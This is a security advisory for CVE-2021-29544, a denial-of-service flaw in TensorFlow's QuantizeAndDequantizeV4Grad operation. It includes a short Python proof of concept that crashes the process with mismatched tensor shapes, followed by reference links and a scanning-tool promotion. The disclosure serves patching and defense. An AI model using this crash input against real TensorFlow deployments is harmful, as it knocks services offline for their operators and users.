CVE-2021-29544: CHECK-fail in `QuantizeAndDequantizeV4Grad`
(updated )
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad:
import tensorflow as tf
gradient_tensor = tf.constant([0.0], shape=[1])
input_tensor = tf.constant([0.0], shape=[1])
input_min = tf.constant([[0.0]], shape=[1, 1])
input_max = tf.constant([[0.0]], shape=[1, 1])
tf.raw_ops.QuantizeAndDequantizeV4Grad(
gradients=gradient_tensor, input=input_tensor,
input_min=input_min, input_max=input_max, axis=0)
References
- github.com/advisories/GHSA-6g85-3hm8-83f9
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-472.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-670.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-181.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/95078c145b5a7a43ee046144005f733092756ab5/tensorflow/core/kernels/quantize_and_dequantize_op.cc
- github.com/tensorflow/tensorflow/blob/95078c145b5a7a43ee046144005f733092756ab5/tensorflow/core/kernels/quantize_and_dequantize_op.h
- github.com/tensorflow/tensorflow/commit/20431e9044cf2ad3c0323c34888b192f3289af6b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-6g85-3hm8-83f9
- nvd.nist.gov/vuln/detail/CVE-2021-29544
Detect and mitigate CVE-2021-29544 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →